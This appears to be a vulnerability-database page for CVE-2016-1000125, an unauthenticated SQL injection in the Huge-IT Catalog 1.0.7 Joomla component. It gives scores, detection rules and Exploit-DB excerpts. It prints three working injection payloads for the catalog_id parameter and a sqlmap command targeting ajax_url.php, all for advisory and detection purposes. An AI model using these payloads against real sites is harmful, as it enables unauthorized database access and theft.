CVE-2016-1000125
published 2016-10-06CVE-2016-1000125: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
PriorityP262critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
2.50%
82.7th percentile
Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| huge-it | huge-it_catalog | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandprod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=↗
commandprod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=↗
commandprod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=↗
- →Monitor POST requests to /components/com_catalog/ajax_url.php with the parameter post=load_more_elements_into_catalog; the catalog_id parameter is unsanitized and directly concatenated into SQL queries, making it the primary injection point. ↗
- →Detect error-based SQL injection attempts by looking for FLOOR(RAND(0)*2) and GROUP BY CONCAT patterns in POST body targeting catalog_id. ↗
- →Detect time-based blind SQL injection by alerting on SLEEP() calls within the catalog_id POST parameter to ajax_url.php. ↗
- →Detect UNION-based SQL injection by looking for UNION ALL SELECT with 15 columns in POST body to ajax_url.php. ↗
- →High volume of HTTP 500 responses from ajax_url.php during a short window is a strong indicator of active SQL injection probing against this component. ↗
- →The vulnerability is unauthenticated — no session or login is required. Any POST to ajax_url.php with post=load_more_elements_into_catalog from an unauthenticated source should be treated as suspicious. ↗
- ·The vulnerable endpoint ajax_url.php is directly accessible under /components/com_catalog/ without any authentication check, meaning no Joomla session token or user privilege is enforced before reaching the injectable code path. ↗
- ·The injection affects multiple POST parameters beyond catalog_id (old_count, count_into_page, show_thumbs, show_description, parmalink), all of which are passed unsanitized; detection rules should cover all these parameters. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection
exploitdb·2017-08-31·CVSS 9.8
CVE-2016-1000125 [CRITICAL] Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection
Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection
---
# Exploit Title Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
# Date: 2016-09-16
# Exploit Author: Larry W. Cashdollar, @_larry0
# Vendor Homepage: http://huge-it.com/joomla-catalog/
# Software Link:
# Version: 1.0.7
# Tested on: Linux
# CVE : CVE-2016-1000125
# Advisory: http://www.vapidlabs.com/advisory.php?v=171
# Exploit:
• $ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php' --data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&parmalink=*"
•
• Parameter: #1* ((custom) POST)
• Type: error-based
• Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
• Payload: prod_page=1&post=load_more
Exploit-DB
Joomla! Component Catalog 1.0.7 - SQL Injection
exploitdb·2016-09-16·CVSS 9.8
[CRITICAL] Joomla! Component Catalog 1.0.7 - SQL Injection
Joomla! Component Catalog 1.0.7 - SQL Injection
---
Title: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-16
Download Site: http://huge-it.com/joomla-catalog/
Vendor: huge-it.com
Vendor Notified: 2016-09-17
Vendor Contact: [email protected]
Description:
Huge-IT Product Catalog is made for demonstration, sale, advertisements for your products. Imagine a stand with a
variety of catalogs with a specific product category. To imagine is not difficult, to use is even easier.
Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL into functions via 'load_more_elements_into_catalog' located in ajax_url.php.
Vulnerable Code in : ajax_url.php
11 define('_JEXEC', 1);
12 defined('_JEXEC')
No writeups or analysis indexed.
2016-10-06
Published